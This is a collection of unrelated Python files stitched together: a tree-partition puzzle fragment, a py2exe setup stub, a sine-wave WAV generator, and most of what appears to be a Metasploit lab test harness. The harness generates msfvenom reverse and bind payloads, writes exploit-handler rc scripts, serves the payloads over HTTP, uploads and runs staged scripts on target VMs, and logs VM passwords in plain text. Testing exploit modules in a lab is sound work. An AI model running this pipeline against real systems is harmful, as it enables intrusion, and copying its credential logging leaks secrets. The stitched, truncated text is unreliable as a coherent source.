if (tParent.data - tChild.data) >= tChild.data:
a = tChild.data
#itrnode = tParent
#tw = tParent.data - tChild.data
if a*2 == total:
ans = a
tParent.removeChild(tChild)
itrnode = tParent.getRootNode()
tw = itrnode.data
tCmpNode = tChild
else:
a = tParent.data - tChild.data
itrnode = tChild
tw = itrnode.data
'''
if (treeNodes[e[0]].data - treeNodes[e[1]].data) >= treeNodes[e[1]].data:
a = treeNodes[e[1]].data
itrnode = treeNodes[e[0]]
tw = treeNodes[e[0]].data - treeNodes[e[1]].data
else:
a = treeNodes[e[0]].data - treeNodes[e[1]].data
itrnode = treeNodes[e[1]]
tw = itrnode.data
'''
#a = treeNodes[e[0]].data - treeNodes[e[1]].data
#itrnode = treeNodes[e[1]]
#treeNodes[e[0]].data = treeNodes[e[0]].data - treeNodes[e[1]].data
tq = [itrnode]
#tw = itrnode.data
while len(tq) > 0:
tn = tq.pop()
for cn in tn.children.values():
if cn == tCmpNode:
continue
tq.append(cn)
b = tw - cn.data
c = cn.data
d = [a,b,c]
tans = d.count(max(d))
#print("d:",d)
if tans >=2 and ans > (max(d) - min(d)):
if (max(d) - min(d) + total) == 3*max(d):
ans = max(d) - min(d)
#print(a,b,c,tw)
#treeNodes[e[0]].data = treeNodes[e[0]].data + treeNodes[e[1]].data
if tCmpNode != None:
tParent.addChild(tCmpNode.key,tCmpNode)
if ans == total:
ans = -1
#print("answer:",ans)
return ans
if __name__ == '__main__':
fptr = open("out.txt", 'w')
q = int(raw_input())
for q_itr in xrange(q):
n = int(raw_input())
c = map(int, raw_input().rstrip().split())
edges = []
for _ in xrange(n - 1):
edges.append(map(int, raw_input().rstrip().split()))
result = balancedForest(c, edges)
fptr.write(str(result) + '\n')
fptr.close()
|
from distutils.core import setup
import py2exe
setup(console=['Mainwindow.py']) |
import numpy as np
import wavio
rate = 22050 # samples per second
T = 3 # sample duration (seconds)
f = 440.0 # sound frequency (Hz)
t = np.linspace(0, T, T*rate, endpoint=False)
x = np.sin(2*np.pi * f * t)
wavio.write("sine24.wav", x, rate, sampwidth=3)
rate = 1024
T = 5
t = np.linspace(0, T, T*rate, endpoint=False)
f1 = 440.0
f2 = 880.0
a1 = 1
a2 = 5
x = np.sin(2*np.pi * f1 * t) + np.cos(2*np.pi * f2 * t)
wavio.write("noise.wav", x, rate, sampwidth=3) |
from datetime import datetime
import os
import time
import json
import vm_automation
from __builtin__ import False
#
# GOT TIRED OF TRACKING THIS DATA IN A LIST
#
class portValue:
"""
THE BELOW portValue CLASS IS HOW I DECIDED TO TRACK THE PORT NUMBERS
I WANTED A SINGLETON, BUT I FOUND NOTHING IN PYTHON THAT DID THAT.
THIS CLASS LETS ME SIMPLY CALL get.portValue() AND IT RETURNS A
UNIQUE PORT VALUE, SO I DO NOT HAVE TO TRACK WHICH VALUES HAVE BEEN USED.
"""
def __init__(self, initialValue):
self.portNumber = initialValue
def get(self):
self.portNumber = self.portNumber + 1
return self.portNumber
def bailSafely(testConfig):
if testConfig != None and 'LOG_FILE' in testConfig:
logFile = testConfig['LOG_FILE']
logMsg(logFile, "AN ERROR HAPPENED; RETURNING VMS TO THEIR FULL UPRIGHT AND LOCKED POSITIONS")
timeToWait = 10
for i in range(timeToWait):
logMsg(logFile, "SLEEPING FOR " + str(timeToWait-i) + " SECOND(S); EXIT NOW TO PRESERVE VMS!")
time.sleep(1)
if resetVms(testConfig):
logMsg(logFile, "SUCCESSFULLY RESET VMS")
else:
logMsg(logFile, "THERE WAS A PROBLEM RESETTING VMS")
exit(998)
def breakoutClones(hostDicList, logFile):
"""
TODO: FIX THIS SO ANYTHING NOT LISTED WILL EXPAND RATHER THAN EXPAND ONLY WHAT'S LISTED
"""
for host in hostDicList:
if "CLONES" in host:
numClones = len(host['CLONES']) + 1 #Don't forget the original
logMsg(logFile, "FOUND " + str(numClones) + " CLONES")
if 'SESSION_DATASETS' in host:
numSessions = len(host['SESSION_DATASETS'])
sessionsPerClone = numSessions/numClones
logMsg(logFile, "USING " + str(sessionsPerClone) + " PAYLOADS PER CLONE")
for clone in host['CLONES']:
cloneDic = {}
for item in host:
if item == 'NAME':
cloneDic[item] = clone['NAME']
logMsg(logFile, "ADDED CLONE " + clone['NAME'])
elif item == 'HYPERVISOR_CONFIG':
if 'HYPERVISOR_CONFIG' in clone:
cloneDic[item] = clone['HYPERVISOR_CONFIG']
else:
cloneDic[item] = host['HYPERVISOR_CONFIG']
elif item == 'SESSION_DATASETS':
if 'SESSION_DATASETS' not in clone:
cloneDic['SESSION_DATASETS'] = []
for index in range(sessionsPerClone):
cloneDic[item].append(host[item].pop(0))
elif item == 'CLONES':
continue
else:
cloneDic[item] = host[item]
hostDicList.append(cloneDic)
def checkData(testConfig):
testResult = True
for target in testConfig['TARGETS']:
logMsg(testConfig['LOG_FILE'], "CHECKING " + target['NAME'])
for sessionData in target['SESSION_DATASETS']:
payloadName = "NONE"
if 'PAYLOAD' in sessionData:
payloadName = sessionData['PAYLOAD']['NAME']
logMsg(testConfig['LOG_FILE'], "CHECKING " + sessionData['MODULE']['NAME'] + ":" + payloadName)
statusFlag = True
try:
fileObj = open(sessionData['LOCAL_SESSION_FILE'], 'r')
fileContents = fileObj.read()
fileObj.close()
except IOError as e:
logMsg(testConfig['LOG_FILE'], "FAILED TO OPEN LOCAL REPORT FILE: " + sessionData['LOCAL_SESSION_FILE'])
continue
for item in target['SUCCESS_LIST']:
if item not in fileContents:
logMsg(testConfig['LOG_FILE'], str(item))
statusFlag = False
sessionData['STATUS'] = statusFlag
if statusFlag:
logMsg(testConfig['LOG_FILE'], sessionData['LOCAL_SESSION_FILE'])
logMsg(testConfig['LOG_FILE'], "TEST PASSED: " + \
target['NAME'] + ':' + \
payloadName + ":" + \
sessionData['MODULE']['NAME'])
else:
testResult = False
logMsg(testConfig['LOG_FILE'], sessionData['LOCAL_SESSION_FILE'])
logMsg(testConfig['LOG_FILE'], "TEST FAILED: " + \
target['NAME'] + ':' + \
payloadName + ":" + \
sessionData['MODULE']['NAME'])
return testResult
def createServer(configFile, logFile = "default.log"):
try:
fileObj = open(configFile, 'r')
configStr = fileObj.read()
fileObj.close()
except IOError as e:
logMsg(logFile, "UNABLE TO OPEN FILE: " + str(configFile) + '\n' + str(e))
return None
try:
hypervisorDic = json.loads(configStr)
except Exception as e:
logMsg(logFile, "UNABLE TO PARSE FILE: " + str(configFile) + '\n' + str(e))
return None
if "HYPERVISOR_TYPE" not in hypervisorDic:
print("INVALID CONFIG FILE; NO HYPERVISOR_TYPE FOUND")
return None
if hypervisorDic['HYPERVISOR_TYPE'].lower() == "esxi":
return vm_automation.esxiServer.createFromConfig(hypervisorDic, logFile)
if hypervisorDic['HYPERVISOR_TYPE'].lower() == "workstation":
return vm_automation.workstationServer(hypervisorDic, logFile)
def expandGlobalAttributes(configData, logFile = "default.log"):
if 'LOG_FILE' in configData:
logFile = configData['LOG_FILE']
if 'TARGET_GLOBALS' in configData:
globalKeys = list(configData['TARGET_GLOBALS'])
for key in globalKeys:
for target in configData['TARGETS']:
if key not in target:
target[key] = configData['TARGET_GLOBALS'][key]
def expandGlobalList(hostList, globalList, listName):
for target in hostList:
if listName not in target:
target[listName] = []
for listItem in globalList:
target[listName].append(listItem)
def expandPayloadsAndModules(testConfig):
for target in testConfig['TARGETS']:
if 'PAYLOADS' not in target:
target['PAYLOADS'] = []
if 'MODULES' not in target:
target['MODULES'] = []
if 'SESSION_DATASETS' not in target:
target['SESSION_DATASETS'] = []
if 'PAYLOADS' in testConfig:
for payload in testConfig['PAYLOADS']:
if 'x64' not in target['NAME'].lower() and 'x64' in payload['NAME'].lower():
#MISMATCHED ARCH; BAIL
continue
if 'win' in target['NAME'].lower() and 'mettle' in payload['NAME'].lower():
#DO ONT USE METTLE PAYLOADS ON WINDOWS
continue
if 'win' not in target['NAME'].lower() and 'win' in payload['NAME'].lower():
#ONLY USE WIN PAYLOADS ON WIN
continue
else:
logMsg(testConfig['LOG_FILE'], "ADDING " + str(payload))
tempPayload = {}
tempPayload['NAME'] = payload['NAME']
tempPayload['SETTINGS'] = payload['SETTINGS'][:]
target['PAYLOADS'].append(tempPayload)
# TODO: ADD A CHECK SO WE DO NOT HAVE MULTIPLE SIMILAR MODULES
if 'MODULES' in testConfig:
for module in testConfig['MODULES']:
target['MODULES'].append(module.copy())
def findAndConfigVms(vmList, vmDataList):
foundVmList = []
for vmData in vmDataList:
try:
vmName = vmData['VM_NAME']
vmUsername = vmData['VM_USERNAME']
vmPassword = vmData['VM_PASSWORD']
except KeyError as e:
logMsg("[JSON PARSE ERROR]: COULD NOT FIND VALUE " + \
str(e))
continue
for j in vmList:
if vmName.lower() in j.vmName.lower():
foundVmList.append(j)
logMsg("ADDING USERNAME " + vmUsername + " PASSWORD " + vmPassword + " TO " + vmName + " : " + j.vmName)
j.setPassword(vmPassword)
j.setUsername(vmUsername)
return foundVmList
def finishAndLaunchStageOne(msfHosts, httpPort, logFile):
# MAKE THE REST OF THE STAGE ONE SCRIPT
"""
ONCE ALL THE RC AND VENOM STUFF IS IN THE STAGE ONE SCRIPT, ADD THE COMMAND TO
START AN HTTP SERVER TO SERVE THE PAYLOADS, THEN WRITE THE SCRIPT TO A LOCAL FILE,
UPLOAD IT, AND RUN IT ON THE MSF_HOST
"""
for msfHost in msfHosts:
msfHost['STAGE_ONE_SCRIPT'] = msfHost['STAGE_ONE_SCRIPT'] + "cd " + msfHost['MSF_PAYLOAD_PATH'] + "/" + "\n"
msfHost['STAGE_ONE_SCRIPT'] = msfHost['STAGE_ONE_SCRIPT'] + "python -m SimpleHTTPServer " + str(httpPort) + " &\n"
msfHost['STAGE_ONE_SCRIPT'] = msfHost['STAGE_ONE_SCRIPT'] + "echo '' > netstat.txt\n"
msfHost['STAGE_ONE_SCRIPT'] = msfHost['STAGE_ONE_SCRIPT'] + "for i in {1..50}; do\n"
# If you reset the file each time, there's a very god chance of getting empty files dring the write process.
msfHost['STAGE_ONE_SCRIPT'] = msfHost['STAGE_ONE_SCRIPT'] + " netstat -ant >> netstat.txt\n"
msfHost['STAGE_ONE_SCRIPT'] = msfHost['STAGE_ONE_SCRIPT'] + " sleep 5\n"
msfHost['STAGE_ONE_SCRIPT'] = msfHost['STAGE_ONE_SCRIPT'] + "done\n"
try:
fileObj = open(msfHost['STAGE_ONE_FILENAME'], 'w')
fileObj.write(msfHost['STAGE_ONE_SCRIPT'])
fileObj.close()
except IOError as e:
logMsg(logFile, "[ERROR] FAILED TO WRITE TO FILE " + msfHost['STAGE_ONE_FILENAME'] + str(e))
return False
remoteStageOneScriptName = msfHost['SCRIPT_PATH'] + '/stageOneScript.sh'
msfHost['VM_OBJECT'].makeDirOnGuest(msfHost['MSF_ARTIFACT_PATH'])
msfHost['VM_OBJECT'].makeDirOnGuest(msfHost['SCRIPT_PATH'])
"""
RUN STAGE ONE SCRIPTS
"""
msfHost['VM_OBJECT'].uploadAndRun(msfHost['STAGE_ONE_FILENAME'], remoteStageOneScriptName)
return True
def checkStagesNeeded(targetData):
stageTwoNeeded = False
stageThreeNeeded = False
for sessionData in targetData['SESSION_DATASETS']:
if 'PAYLOAD' in sessionData:
stageTwoNeeded = True
if 'bind' in sessionData['PAYLOAD']['NAME']:
stageThreeNeeded = True
return (stageTwoNeeded, stageThreeNeeded)
def finishStageTwo(testConfig, terminationToken, timeoutSec = 300):
for waitCycles in range(timeoutSec/5):
stageTwoComplete = True
try:
for host in testConfig['TARGETS']:
stageTwoNeeded, stageThreeNeeded = checkStagesNeeded(host)
if stageTwoNeeded:
if 'VM_TOOLS_UPLOAD' in host['METHOD'].upper():
if 'TERMINATION_TOKEN' not in host:
localFile = testConfig['REPORT_DIR'] + "/" + host['NAME'] + "_stageTwoLog_" + str(waitCycles) + ".txt"
if 'REMOTE_LOG' not in host:
logMsg(testConfig['LOG_FILE'], "REMOTE_LOG NOT IN: " + str(host['NAME']))
host['VM_OBJECT'].getFileFromGuest(host['REMOTE_LOG'], localFile)
try:
logFileObj = open(localFile, 'r')
logData = logFileObj.read()
logFileObj.close()
except IOError as e:
logMsg(testConfig['LOG_FILE'], "FAILED READING REMOTE LOG FILE: " + localFile + "\n" + str(e))
logData = ""
pass
if terminationToken not in logData:
logMsg(testConfig['LOG_FILE'], "NO TERMINATION TOKEN IN LOGFILE ON " + host['NAME'] + "\n")
stageTwoComplete = False
else:
logMsg(testConfig['LOG_FILE'], "TERMINATION TOKEN FOUND IN LOGFILE ON " + host['NAME'] + "\n")
localFile = testConfig['REPORT_DIR'] + "/" + host['NAME'] + "_netstat_" + str(waitCycles) + ".txt"
host['TERMINATION_TOKEN'] = True
else:
logMsg(testConfig['LOG_FILE'], "ALREADY FOUND TERMINATION TOKEN ON " + host['NAME'] + "\n")
if stageTwoComplete == True:
break;
time.sleep(5)
except KeyboardInterrupt:
print("CAUGHT KEYBOARD INTERRUPT; ABORTING TEST AND RESETTING VMS....")
return False
return True
def generateBranchScript(branchString, logFile):
gitScript = ""
branchData = branchString.split('/')
logMsg(logFile, "FRAMEWORK BRANCH LIST: " + str(branchData))
logMsg(logFile, "FRAMEWORK BRANCH LIST LENGTH: " + str(len((branchData))))
if len(branchData) > 0 and ((branchData[0] == 'upstream' or branchData[0] == 'origin') or (len(branchData) == 1)):
# EITHER A COMMIT VERSION IN MASTER, PR OR upstream/master...... JUST USE WHAT THEY GAVE
logMsg(logFile, "FRAMEWORK REPO TO USE: " + branchString)
gitScript = "git checkout " + branchString + "\n"
else:
# NONSTANDARD REPO......
logMsg(logFile, "NONSTANDARD FRAMEWORK REPO DETECTED: " + branchString)
userName = branchData[0]
logMsg(logFile, "NONSTANDARD FRAMEWORK USERNAME: " + userName)
repoName = branchData[1]
logMsg(logFile, "NONSTANDARD FRAMEWORK REPO NAME: " + repoName)
branchName = branchData[2]
logMsg(logFile, "NONSTANDARD FRAMEWORK BRANCH NAME: " + branchName)
gitSyntax = "https://github.com/" + userName + "/" + repoName + ".git"
gitScript = gitScript + "git remote add " + userName + " " + gitSyntax + "\n"
gitScript = gitScript + "git fetch " + userName + "\n"
gitScript = gitScript + "git checkout -b " + branchName + ' ' + userName + '/' + branchName + "\n"
return gitScript
def getCreds(configData, logFile = "default.log"):
if 'LOG_FILE' in configData:
logFile = configData['LOG_FILE']
try:
credsFile = open(configData['CREDS_FILE'], 'r')
credsStr = credsFile.read()
credsFile.close()
except IOError as e:
logMsg(logFile, "UNABLE TO OPEN FILE: " + str(configData['CREDS_FILE']) + '\n' + str(e))
return False
try:
credsDic = json.loads(credsStr)
except Exception as e:
logMsg(logFile, "UNABLE TO PARSE FILE: " + str(configData['CREDS_FILE']) + '\n' + str(e))
return False
vmList = configData['MSF_HOSTS'] + configData['TARGETS']
for vm in vmList:
if 'USERNAME' not in vm:
logMsg(logFile, "NO USERNAME FOR " + str(vm['NAME']) + '\n')
username = getElement('USERNAME', vm['NAME'], credsDic)
if username == False:
return False
else:
logMsg(logFile, "FOUND USERNAME FOR " + str(vm['NAME']) + '\n')
vm['USERNAME'] = username
if 'PASSWORD' not in vm:
logMsg(logFile, "NO PASSWORD FOR " + str(vm['NAME']) + '\n')
password = getElement('PASSWORD', vm['NAME'], credsDic)
if password == False:
return False
else:
logMsg(logFile, "FOUND PASSWORD FOR " + str(vm['NAME']) + '\n')
vm['PASSWORD'] = password
return True
def getElement(element, vmName, credsDic):
for credVmName in credsDic.keys():
if vmName.strip() == credVmName:
if element in credsDic[credVmName]:
return credsDic[credVmName][element]
return False
def getListFromFile(fileName):
retList = []
logMsg("GETTING COMMANDS FROM " + str(fileName))
if fileName != None:
with open(fileName, 'r') as fileObj:
for i in fileObj.readlines():
if '#' != i.strip()[0]:
retList.append(i.strip())
logMsg(str(retList))
return retList
def getSessionCount(testConfig):
sessionCount = 0
for host in testConfig['TARGETS']:
if 'SESSION_DATASETS' in host:
sessionCount = sessionCount + len(host['SESSION_DATASETS'])
return sessionCount
def getTimestamp():
return str(time.time()).split('.')[0]
def instantiateVmsAndServers(testConfig):
testVms = []
hypervisorDic = {}
logFile = testConfig['LOG_FILE']
for target in testConfig['MSF_HOSTS'] + testConfig['TARGETS']:
logMsg(logFile, "PROCESSING: " + target['NAME'])
if target['TYPE'].upper() == 'VIRTUAL':
if target['HYPERVISOR_CONFIG'] in hypervisorDic:
target['SERVER_OBJECT'] = hypervisorDic[target['HYPERVISOR_CONFIG']]
else:
hypervisorDic[target['HYPERVISOR_CONFIG']] = createServer(target['HYPERVISOR_CONFIG'], logFile)
target['SERVER_OBJECT'] = hypervisorDic[target['HYPERVISOR_CONFIG']]
target['SERVER_OBJECT'].enumerateVms()
"""
INSTANTIATE VM INSTANCE AND STORE IT IN THE DICTIONARY
"""
vmFound = False
for vm in target['SERVER_OBJECT'].vmList:
if vm.vmName == target['NAME']:
vmFound = True
logMsg(logFile, "FOUND VM: " + vm.vmName + " ON " + vm.server.hostname)
target['VM_OBJECT'] = vm
testVms.append(vm)
logMsg(logFile, "ASSIGNED VM: " + str(vm))
if 'PASSWORD' in target:
vm.setPassword(target['PASSWORD'])
if 'USERNAME' in target:
vm.setUsername(target['USERNAME'])
if not vmFound:
logMsg(logFile, "DID NOT FIND VM: " + target['NAME'] + " ON " + vm.server.hostname)
testVms.append(None)
return testVms
def launchStageThree(testConfig):
for msfHost in testConfig['MSF_HOSTS']:
localScriptName = testConfig['SCRIPT_DIR'] + "/stageThree_" + '-'.join(msfHost['IP_ADDRESS'].split('.')) + ".sh"
try:
fileObj = open(localScriptName, 'w')
fileObj.write(msfHost['STAGE_THREE_SCRIPT'])
fileObj.close()
except IOError as e:
logMsg(testConfig['LOG_FILE'], "[ERROR] FAILED TO OPEN FILE " + localScriptName + '\n' + str(e))
return False
remoteScriptName = msfHost['SCRIPT_PATH'] + "/stageThree.sh"
remoteInterpreter = None
if not msfHost['VM_OBJECT'].uploadAndRun(localScriptName, remoteScriptName, remoteInterpreter):
logMsg(testConfig['LOG_FILE'], "[FATAL ERROR]: FAILED TO UPLOAD/EXECUTE " + localScriptName + " ON " + msfHost['VM_OBJECT'].vmName)
return False
return True
def launchStageTwo(testConfig, terminationToken, schedDelay = 180):
stageTwoNeeded = False
stageThreeNeeded = False
addScheduleDelay = False
for target in testConfig['TARGETS']:
logMsg(testConfig['LOG_FILE'], "PROCESSING " + target['NAME'])
stageTwoNeeded, stageThreeNeeded = checkStagesNeeded(target)
for sessionData in target['SESSION_DATASETS']:
if 'PAYLOAD' in sessionData:
stageTwoNeeded = True
if 'bind' in sessionData['PAYLOAD']['NAME']:
stageThreeNeeded = True
if stageTwoNeeded:
if 'VM_TOOLS_UPLOAD' in target['METHOD'].upper():
remoteInterpreter = None
escapedIp = 'x'.join(target['IP_ADDRESS'].split('.'))
logMsg(testConfig['LOG_FILE'], "I THINK " + target['NAME'] + " HAS IP ADDRESS " + target['IP_ADDRESS'])
if 'win' in target['NAME'].lower():
target['REMOTE_LOG'] = target['PAYLOAD_DIRECTORY'] + "\\stageTwoLog.txt"
target['STAGE_TWO_FILENAME'] = "stageTwoScript_" + escapedIp + ".py"
remoteScriptName = target['PAYLOAD_DIRECTORY'] + "\\" + target['STAGE_TWO_FILENAME']
remoteInterpreter = target['PYTHON']
target['STAGE_TWO_SCRIPT'] = target['STAGE_TWO_SCRIPT'] + \
makeStageTwoPyScript(target, testConfig['HTTP_PORT'], target['REMOTE_LOG'], terminationToken)
else:
target['REMOTE_LOG'] = target['PAYLOAD_DIRECTORY'] + "/stageTwoLog.txt"
target['STAGE_TWO_FILENAME'] = "stageTwoScript_" + escapedIp + ".sh"
remoteScriptName = target['PAYLOAD_DIRECTORY'] + "/" + target['STAGE_TWO_FILENAME']
remoteInterpreter = None
target['STAGE_TWO_SCRIPT'] = target['STAGE_TWO_SCRIPT'] + \
makeStageTwoShScript(target, testConfig['HTTP_PORT'], target['REMOTE_LOG'], terminationToken)
localScriptName = testConfig['SCRIPT_DIR'] + "/" + target['STAGE_TWO_FILENAME']
try:
fileObj = open(localScriptName, 'w')
fileObj.write(target['STAGE_TWO_SCRIPT'])
fileObj.close()
except IOError as e:
logMsg(testConfig['LOG_FILE'], "[ERROR] FAILED TO WRITE TO FILE " + localScriptName + str(e))
return (False)
logMsg(testConfig['LOG_FILE'], "METHOD= " + target['METHOD'])
if ('win' in target['NAME'].lower()) and ('schedule' in target['METHOD'].lower()):
addScheduleDelay = True
launchResult = target['VM_OBJECT'].uploadAndSchedule(localScriptName, remoteScriptName, schedDelay, remoteInterpreter)
else:
launchResult = target['VM_OBJECT'].uploadAndRun(localScriptName, remoteScriptName, remoteInterpreter)
if launchResult:
logMsg(testConfig['LOG_FILE'], "[INFO]: SUCCESSFULLY LAUNCHED " + localScriptName + " ON " + target['VM_OBJECT'].vmName)
else:
logMsg(testConfig['LOG_FILE'], "[FATAL ERROR]: FAILED TO UPLOAD/EXECUTE " + localScriptName + " ON " + target['VM_OBJECT'].vmName)
else:
logMsg(testConfig['LOG_FILE'], "NO STAGE TWO REQUIRED FOR " + target['NAME'])
if addScheduleDelay:
# IF WE SCHEDULED THE JOBS, ADD THE DELAY IN BEFORE WE BOTHER CHECKING ON THE PROGESS
realSleepTime = schedDelay + 60
logMsg(testConfig['LOG_FILE'], "[INFO]: SLEEPING FOR " + str(realSleepTime) + " TO ALLOW SCHEDULED TASKS TO START")
time.sleep(realSleepTime)
else:
logMsg(testConfig['LOG_FILE'], "NO STAGE TWO WAIT REQUIRED")
return (True, stageTwoNeeded, stageThreeNeeded)
def loadJson(fileName):
"""
READ IN THE JSON FILES AND RETURN A DICTIONARY
GOT TIRED OF WRITING THE TRY/CATCH BLOCKS IN A COUPLE PLACES
"""
retDict = None
try:
fileObj = open(fileName, 'r')
jsonStr = fileObj.read()
fileObj.close()
except IOError as e:
logMsg("FAILED TO FIND JSON FILE " + fileName + "\n" + str(e))
return retDict
try:
retDict = json.loads(jsonStr)
except ValueError as f:
logMsg("FAILED TO PARSE JSON FILE " + fileName + "\n" + str(f))
return retDict
def logMsg(logFile, strMsg):
if strMsg == None:
strMsg="[None]"
dateStamp = 'testlog:[' + str(datetime.now())+ '] '
try:
logFileObj = open(logFile, 'a')
logFileObj.write(dateStamp + strMsg +'\n')
logFileObj.close()
except IOError:
return False
return True
def logTargetData(testConfig):
"""
DEBUG PRINT
"""
for target in testConfig['TARGETS']:
logMsg(testConfig['LOG_FILE'], "================================================================================")
logMsg(testConfig['LOG_FILE'], "SESSION_DATASETS FOR " + target['NAME'])
logMsg(testConfig['LOG_FILE'], "================================================================================")
for sessionData in target['SESSION_DATASETS']:
if 'PAYLOAD' in sessionData:
logMsg(testConfig['LOG_FILE'], sessionData['MODULE']['NAME'] + ":" + sessionData['PAYLOAD']['NAME'])
else:
logMsg(testConfig['LOG_FILE'], sessionData['MODULE']['NAME'])
return None
def makeHtmlReport(targetData, msfHosts):
htmlString = "<html>\n<head>\n<title>\n\tTEST RESULTS\n</title>\n</head>\n\n<body>\n"
htmlString = htmlString + "<table border=\"1\">\n<tr><td>MSF_HOST NAME</td><td>MSF_HOST IP</td><td>MSF COMMIT VERSION</td><td>PCAP</td></tr>\n"
for msfHost in msfHosts:
pcapLink = "<a href=" + msfHost['LOCAL_PCAP'] + ">PCAP FILE</a>"
htmlString = htmlString + "<tr><td>" + msfHost['NAME'] + "</td><td>" + msfHost['IP_ADDRESS'] + "</td><td>" + msfHost['COMMIT_VERSION'] + "</td><td>" + pcapLink + "</td></tr>\n"
htmlString = htmlString + "</table>\n"
htmlString = htmlString + "<table border=\"1\">\n<tr><td>TARGET</td><td>TYPE</td><td>MSF_HOST</td><td>MODULE</td><td>PAYLOAD</td><td>STATUS</td><td>SESSION</td></tr>\n"
passedString = "<td bgcolor = \"#00cc00\">PASSED</td>"
failedString = "<td bgcolor = \"#cc0000\">FAILED</td>"
for host in targetData:
for sessionData in host['SESSION_DATASETS']:
payloadFileName = "NO PAYLOAD FILE"
payloadName = "NO PAYLOAD (AUX?)"
interpreter = ""
if 'PAYLOAD' in sessionData:
payloadName = sessionData['PAYLOAD']['NAME'].lower()
if 'FILENAME' in sessionData['PAYLOAD']:
payloadFileName = sessionData['PAYLOAD']['FILENAME']
if 'java' in payloadName:
interpreter = "<br>" + host['METERPRETER_JAVA']
if 'python' in payloadName:
interpreter = "<br>" + host['METERPRETER_PYTHON']
htmlString = htmlString + "<tr><td>" + host['NAME'] + "<br>" + host['IP_ADDRESS'] + "</td>" + \
"<td>" + host['TYPE'] + "</td>" + \
"<td>" + sessionData['MSF_HOST']['NAME'] + "<br>" + sessionData['MSF_HOST']['IP_ADDRESS'] + "</td>" + \
"<td>" + sessionData['MODULE']['NAME'] + "</td>" + \
"<td>" + payloadName + "<br>" + payloadFileName + interpreter + "</td>"
if 'STATUS' in sessionData:
if sessionData['STATUS']:
htmlString = htmlString + passedString + "\n"
else:
htmlString = htmlString + failedString + "\n"
else:
htmlString = htmlString + "<td> NO STATUS LISTED?</td>\n"
htmlString = htmlString + "<td><a href=" + sessionData['LOCAL_SESSION_FILE'] + ">SESSION CONTENT</a></td></tr>\n"
htmlString = htmlString + "</table>\n</body>\n</html>\n"
return htmlString
def makeVenomCmd(targetData, sessionData, portNum, logFile):
payloadData = sessionData['PAYLOAD']
payloadType = payloadData['NAME']
payloadFileName = payloadData['FILENAME']
msfHostData = sessionData['MSF_HOST']
"""
WHAT FILE EXTENSION SHOULD WE USE?
"""
execFormat = ''
if 'windows' in payloadData['NAME'].lower():
payloadFileName = payloadFileName + ".exe"
execFormat = ' -f exe '
elif 'linux' in payloadData['NAME'].lower():
payloadFileName = payloadFileName + ".elf"
execFormat = ' -f elf '
elif 'python' in payloadData['NAME'].lower():
payloadFileName = payloadFileName + ".py"
elif 'java' in payloadData['NAME'].lower():
payloadFileName = payloadFileName + ".jar"
else:
logMsg(logFile, "UNKNOWN PAYLOAD TYPE: " + payloadData['NAME'].lower())
payloadData['FILENAME'] = payloadFileName
logMsg(logFile, "PAYLOAD FILENAME = " + payloadData['FILENAME'])
msfVenomCmd = "./msfvenom -p " + payloadData['NAME'] + execFormat + " -o " + payloadData['FILENAME']
# ADD HOST DATA
if 'bind' in payloadType.lower():
msfVenomCmd = msfVenomCmd + " RHOST=" + targetData['IP_ADDRESS'] + " LPORT=" + str(payloadData['PRIMARY_PORT'])
else:
msfVenomCmd = msfVenomCmd + " LHOST=" + msfHostData['IP_ADDRESS'] + " LPORT=" + str(payloadData['PRIMARY_PORT'])
for settingEntry in payloadData['SETTINGS']:
processedString = replaceWildcards(settingEntry, targetData, sessionData, portNum)
msfVenomCmd = msfVenomCmd + " " + settingEntry
logMsg(logFile, "msfvenom cmd = " + msfVenomCmd)
return msfVenomCmd
def makeRcScript(cmdList, targetData, sessionData, logFile, portNum):
if 'PAYLOAD' in sessionData:
payloadName = sessionData['PAYLOAD']['NAME']
else:
payloadName = "NONE"
rcScriptContent = "# HANDLER SCRIPT FOR \n" + \
"# MODULE: " + sessionData['MODULE']['NAME'] + "\n" + \
"# PAYLOAD: " + payloadName + "\n" + \
"# TARGET: " + targetData['NAME'] + ' [' + targetData['IP_ADDRESS'] +"]\n" + \
"# MSF HOST: " + sessionData['MSF_HOST']['IP_ADDRESS'] + "\n"
rcScriptName = sessionData['RC_IN_SCRIPT_NAME']
rubySleep = "echo '<ruby>' >> " + rcScriptName + '\n'
rubySleep = rubySleep + "echo ' sleep(2)' >> " + rcScriptName + '\n'
rubySleep = rubySleep + "echo '</ruby>' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo 'use " + sessionData['MODULE']['NAME'] + " ' > " + rcScriptName + "\n"
if sessionData['MODULE']['NAME'] != 'exploit/multi/handler':
# THIS IS TERRIBLE, AND I WISH WE DID NOT HAVE TO DO THIS MAYBE ONLY FOR AUX LATER?
rcScriptContent = rcScriptContent + "echo 'set RHOST " + targetData['IP_ADDRESS'] + " ' >> " + rcScriptName + "\n"
rcScriptContent = rcScriptContent + "echo 'set RHOSTS " + targetData['IP_ADDRESS'] + " ' >> " + rcScriptName + "\n"
for settingItem in sessionData['MODULE']['SETTINGS']:
processedString = replaceWildcards(settingItem, targetData, sessionData, portNum)
if '=' in processedString:
rcScriptContent = rcScriptContent + "echo 'set " + processedString.split('=')[0] + ' ' + processedString.split('=')[1] + "' >> " + rcScriptName + '\n'
if 'PAYLOAD' in sessionData:
rcScriptContent = rcScriptContent + "echo 'set payload " + sessionData['PAYLOAD']['NAME'] +"' >> " + rcScriptName + '\n'
for settingItem in sessionData['PAYLOAD']['SETTINGS']:
rcScriptContent = rcScriptContent + "echo 'set " + settingItem.split('=')[0] + ' ' + settingItem.split('=')[1] + "' >> " + rcScriptName + '\n'
if 'bind' in sessionData['PAYLOAD']['NAME']:
rcScriptContent = rcScriptContent + "echo 'set RHOST " + targetData['IP_ADDRESS'] + "' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo 'set LPORT " + str(sessionData['PAYLOAD']['PRIMARY_PORT']) + "' >> " + rcScriptName + '\n'
if 'reverse' in sessionData['PAYLOAD']['NAME']:
rcScriptContent = rcScriptContent + "echo 'set LHOST " + sessionData['MSF_HOST']['IP_ADDRESS'] + "' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo 'set LPORT " + str(sessionData['PAYLOAD']['PRIMARY_PORT']) + "' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo 'show options' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + rubySleep
if sessionData['MODULE']['NAME'] != 'exploit/multi/handler':
rcScriptContent = rcScriptContent + "echo 'check' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo 'run -z' >> " + rcScriptName + '\n'
